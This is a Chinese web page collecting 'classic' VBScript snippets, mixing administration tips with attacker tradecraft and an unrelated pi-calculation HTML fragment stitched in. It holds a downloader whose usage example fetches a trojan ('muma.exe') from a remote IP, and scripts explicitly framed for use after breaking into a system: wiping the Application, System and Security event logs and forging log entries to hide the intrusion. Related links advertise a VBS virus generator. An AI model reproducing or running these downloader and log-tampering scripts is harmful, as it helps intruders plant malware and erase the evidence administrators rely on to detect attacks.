收集的一些经典的vbs脚本大全

记录一些经典的vbs脚本

1.文件下载(无回显) 
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe 
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe 
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe 
echo xPost.Open "GET",iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe

用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe

2.列举进程 
@echo for each ps in getobject _ >ps.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs 
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs

用法:cscript ps.vbs

3.终止进程 
@echo for each ps in getobject _ >pskill.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs 
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs

用法:cscript pskill.vbs pid

4.重启系统 
@echo for each os in getobject _ >reboot.vbs 
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs

用法:cscript reboot.vbs

VBS脚本在系统安全中的八则巧妙应用 
VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下,还可用WSH来访问Windows NT活动目录服务。 
   
  用VBS编写的脚本程序在窗口界面是由wscript.exe文件解释执行的,在字符界面由cscript.exe文件解释执行。wscript.exe是一个脚本语言解释器,正是它使得脚本可以被执行,就象执行批处理一样。关于VBS大家一定比我熟悉多了,所以再不废话,直接进入主题,看看我总结的VBS在系统安全中的八则妙用吧。 
   
  一、给注册表编辑器解锁 
   
  用记事本编辑如下内容: 
   
  DIM WSH 
  SET WSH=WSCRIPT.CreateObject("WSCRIPT.SHELL") '击活WScript.Shell对象 
  WSH.POPUP("解锁注册表编辑器!") 
  '显示弹出信息“解锁注册表编辑器!” 
  WSH.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion 
  \Policies\System\DisableRegistryTools",0,"REG_DWORD" 
  '给注册表编辑器解锁 
  WSH.POPUP("注册表解锁成功!") 
  '显示弹出信息“注册表解锁成功!” 
  保存为以.vbs为扩展名的文件,使用时双击即可。 
   
  二、关闭Win NT/2000的默认共享 
   
  用记事本编辑如下内容: 
   
  Dim WSHShell'定义变量 
  set WSHShell=CreateObject("WScript.shell") '创建一个能与操作系统沟通的对象WSHShell 
  Dim fso,dc 
  Set fso=CreateObject("Scripting.FileSystemObject")'创建文件系统对象 
  set dc=fso.Drives '获取所有驱动器盘符 
  For Each d in dc 
  Dim str 
  WSHShell.run("net share"&d.driveletter &"$ /delete")'关闭所有驱动器的隐藏共享 
  next 
  WSHShell.run("net share admin$ /delete") 
  WSHShell.run("net share ipc$ /delete")'关闭admin$和ipc$管道共享 
   
  现在来测试一下,先打开cmd.exe,输入net share命令就可以看到自己机子上的共享。双击执行stopshare.vbs后,会看见窗口一闪而过。然后再在cmd里输入net share命令,这时候没有发现共享列表了 
   
  三、显示本机IP地址 
   
  有许多时候,我们需要知道本机的IP地址,使用各种软件虽然可以办到,但用VBS脚本也非常的方便。用记事本编辑如下内容: 
   
  Dim WS 
  Set WS=CreateObject("MSWinsock.Winsock") 
  IPAddress=WS.LocalIP 
  MsgBox "Local IP=" & IPAddress 
   
  将上面的内容保存为ShowIP.vbs,双击执行即可得到本机IP地址。 
   
  四、利用脚本编程删除日志 
   
  入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下: 
   
  strComputer= "." 
  Set objWMIService = GetObject("winmgmts:" _ 
  & "{impersonationLevel=impersonate,(Backup)}!\\" & _ 
  strComputer & "\root\cimv2") 
  dim mylogs(3) 
  mylogs(1)="application" 
  mylogs(2)="system" 
  mylogs(3)="security" 
  for Each logs in mylogs 
  Set colLogFiles=objWMIService.ExecQuery _ 
  ("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") 
  For Each objLogfile in colLogFiles 
  objLogFile.ClearEventLog() 
  Next 
  next 
   
  将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog()方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。 
   
  五、利用脚本伪造日志 
   
  删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何伪造日志。利用脚本编程中的eventlog方法创造日志非常简单,请看下面的代码: 
   
  set ws=wscript.createobject("Wscript.shell") 
  ws.logevent 0 ,"write log success" '创建一个成功执行日志 
   
  将上面的代码保存为createlog.vbs即可。这段代码很容易理解,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法。logevent的用法:logevent eventtype,"description" [,remote system],其中eventtype为日志类型,可以使用的参数如下:0代表成功执行,1执行出错,2警告,4信息,8成功审计,16故障审计。所以上面代码中,把0改为1,2,4,8,16均可,引号中的内容为日志描述。利用这种方法写的日志有一个缺点,即只能写到应用程序日志,而且日志来源只能为WSH,即Windows Scripting Host,所以不能起太多的隐蔽作用,在此仅供大家参考。 
   
  六、禁用开始菜单选项 
   
  用记事本编辑如下内容: 
   
  Dim ChangeStartMenu 
  Set ChangeStartMenu=WScript.CreateObject("WScript.Shell") 
  RegPath="HKCR\Software\Microsoft\Windows\CurrentVersion\Policies\" 
  Type_Name="REG_DWORD" 
  Key_Data=1 
   
  StartMenu_Run="NoRun" 
  StartMenu_Find="NoFind" 
  StartMenu_Close="NoClose" 
   
  Sub Change(Argument) 
  ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name 
  MsgBox("Success!") 
  End Sub 
   
  Call Change(StartMenu_Run) '禁用“开始”菜单中的“运行”功能 
  Call Change(StartMenu_Find) '禁用“开始”菜单中的“查找”功能 
  Call Change(StartMenu_Close) '禁用“开始”菜单中的“关闭系统”功能 
   
  将以上代码保存为ChangeStartMenu.vbs文件,使用时双击即可。 
   
  七、执行外部程序 
   
  用记事本编辑如下内容: 
   
  DIM objShell 
  set objShell=wscript.createObject("wscript.shell") 
  iReturn=objShell.Run("cmd.exe /C set var=world", 1, TRUE) 
   
  保存为.vbs文件即可。在这段代码中,我们首先设置了一个环境变量,其名为var,而值为world,用户可以使用%Comspec%来代替cmd.exe,并且可以把命令:set var=world改成其它的命令,这样就可以使它可以运行任意的命令。 
   
  八、重新启动指定的IIS服务 
   
  用记事本编辑如下内容: 
   
  Const ADS_SERVICE_STOPPED = 1 
  Set objComputer = GetObject("WinNT://MYCOMPUTER,computer") 
  Set objService = objComputer.GetObject("Service","MYSERVICE") 
  If (objService.Status = ADS_SERVICE_STOPPED) Then 
  objService.Start 
  End If 
   
  将它以startsvc.vbs为名保存在C盘根目录。并通过如下命令执行:cscript c:\startsvc.vbs。运行后,经你指定的IIS服务项将被重新开启。 
   
  最后,我们再说说开篇时提到的VBS脚本病毒的防范方法。VBS病毒的执行离不开WSH,在带给人们便利的同时,WSH也为病毒的传播留下可乘之机。所以要想防范VBS病毒,可以选择将WSH卸载,只要打开控制面板,找到“添加/删除程序”,点选“Windows安装程序”,再鼠标双击其中的“附件”一项,然后再在打开的窗口中将“Windows Scripting Host”一项的“√”去掉,然后连续点两次“确定”就可以将WSH卸载。或者,你也可以点击“我的电脑”→“查看”→“文件夹选项”,在弹出的对话框中,点击“文件类型”,然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射,都可以达到防范VBS脚本病毒的目的。

当最后一项的绝对值小于0.000001时停止计算。

编写如下VBScript程序代码:

<HTML>

<HEAD><TITLE>计算圆周率π</TITLE></HEAD>

<BODY><H3>计算圆周率π</H3><HR>

<INPUT TYPE="Button" NAME="Button1" VALUE="计算">

<SCRIPT FOR="Button1" EVENT="onClick" LANGUAGE="VBScript">

k = 1: s = 1: t = 1: m = 1

图3-12 计算圆周率 
While Abs(t) > 0.0000001

k = k + 2

m = -m

t = m / k

s = s + t

Wend

MsgBox "圆周率π=" & 4 * s

</SCRIPT>

</BODY>

</HTML>

执行VBScript程序,浏览器显示如图3-12所示。

注意:程序运行时间可能很长。

只有30字节,能写什么?

(0)

相关推荐

  • 收集的一些经典的vbs脚本大全

    记录一些经典的vbs脚本 1.文件下载(无回显)  echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe  echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe  echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe  echo xPost.Open "GET",i

  • vbs脚本大全,配有实例 DOS命令,批处理 脚本 代码

    VBS   取得本机IP strComputer = "."  Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set IPConfigSet = objWMIService.ExecQuery("Select IPAddress from Win32_NetworkAdapterConfiguration Where

  • Vbs脚本经典教材(最全的资料还是MSDN)

      -为什么要使用Vbs? 在Windows中,学习计算机操作也许很简单,但是很多计算机工作是重复性劳动,例如你每周也许需要对一些计算机文件进行复制.粘贴.改名.删除,也许你每天启动计算机第一件事情就是打开WORD,切换到你喜爱的输入法进行文本编辑,同时还要播放优美的音乐给工作创造一个舒心的环境,当然也有可能你经常需要对文本中的某些数据进行整理,把各式各样的数据按照某种规则排列起来--.这些事情重复.琐碎,使人容易疲劳. 第三方软件也许可以强化计算机的某些功能,但是解决这些重复劳动往往事倍功半,

  • 如何用VBS脚本收集远程计算机或本地计算机安装的软件

    目标 用VBS脚本收集域中远程计算机或本地计算机安装的软件,Windows版本.并将收集的结果保存到计算机名为文件名的文本文件中.文本文件可以保存到网络路径中或当前VBS文件所在目录.同时支持32位和64位系统. 并过滤到一些补丁包.Office组件.NVIDIA.Intel®的驱动等. 制作VBS脚本 保存下面的VBS程序代码到vbs文件中 On Error Resume Next Const HKCU = &h80000001 Const HKLM = &H80000002 Const

  • 对一个vbs脚本病毒的病毒原理分析

    一.前言 病毒课老师丢给我们一份加密过的vbs脚本病毒的代码去尝试分析,这里把分析过程发出来,供大家参考,如果发现文中有什么错误或者是有啥建议,可以直接留言给我,谢谢! 二.目录 整个分析过程可以分为以下几个部分: 0x00 准备工作 0x01 解密部分 0x02 功能分析 三.分析过程 0x00 准备工作 windows xp的虚拟机(在自己的windows下也可以做) vbs的一些基本语法 0x01 解密部分 右击病毒文件然后编辑打开或者是直接把其后缀修改成txt直接打开都行,可以看到一大段

  • 自定义vbs脚本实现开机后延时启动指定程序的方法

    概述 系统开机时,顺带自动启动了不少驱动程序,使得电脑开机后鼠标要呆滞许久.为了加快windows的开机速度,在参考网上不少大牛的资料后,整理出使用vbs脚本实现开机后延时启动程序的方法 vbs内容示例: 复制代码 代码如下: Dim delayer Set delayer = CreateObject("WScript.Shell") WScript.sleep 8000 delayer.Run """C:\Program Files(x86)\King

  • vbs脚本病毒生成器 下载

    Vbs脚本病毒生成器 V1.0 版  简 介: 国产的新编的vbs脚本病毒生成器1.0版, 本程序通过采集用户的各项输入.选择,产生符合需要的vbs脚本病毒,属于傻瓜式的vbs病毒制造程序.从此以后,要制造vbs脚本病毒不用再学编程了!(当然还是懂点编程为妙:-)). 需要注意的是,请您不要运行产生的vbs病毒!另外,产生病毒的同时,本程序也产生一个恢复文件,叫做"reset.vbs",万一您不慎运行了病毒,可以运行它解毒!怎麽样?想得够周到吧! 我们可以利用它的功能,来学习vbs的各

  • VBS脚本的GUI界面 HTA简明教程(网络搜集整理)

    作者:薛靖澜 原来网页中的工具栏.地址栏以及菜单栏在这个窗口里都没有被显示出来,还可以使用html中的绝大多数标签.脚本等,这就给予你对界面设计更多的控制权.(天哪,当我看到这句话的时候,心情是多么的激动,这不是专为vbs脚本设计的gui界面吗?) 与普通HTML网页相比,它多了HTA:APPLICATION标签,其实就是这个标签提供了一系列面向应用程序的功能,这个特殊的标签,允许你控制这个应用程序的用户界面(UI).<HTA:APPLICATION>标签位于<HEAD>标签里,它

  • 可以将Bat转换位VBS文件的VBS脚本

    下面代码稍有修改,原结构是脚本与释放的bat同步执行并等待bat执行完毕后删除bat,本意是不遗留临时文件.后来想想通用性不好,比如释放执行的bat文件是个常驻进程的监视类型那VBS也会无休止的等待而无法退出,所以还是改为异步执行,脚本调用bat后自行退出.考虑到还原原文件的完整性末尾添加自删除也打消了想法.压缩包暂未更新. 复制代码 代码如下: 'bat2vbs.vbs by baomaboy Dim WshSHell,FSO On Error Resume Next Set WshSHell

  • VBS脚本和BAT批处理删除自身的方法

    VBS脚本和BAT批处理自身删除的方法(自杀) 删除自身之:VBS 把下面的脚本保存为selfkill.vbs或selfkill.vbe: 复制代码 代码如下: Set fso = CreateObject("Scripting.FileSystemObject") f = fso.DeleteFile(WScript.ScriptName) WScript.Echo( WScript.ScriptName) 然后运行它,是不是发现selfkill.vbs神奇的消失啦?而后面的对话框却

随机推荐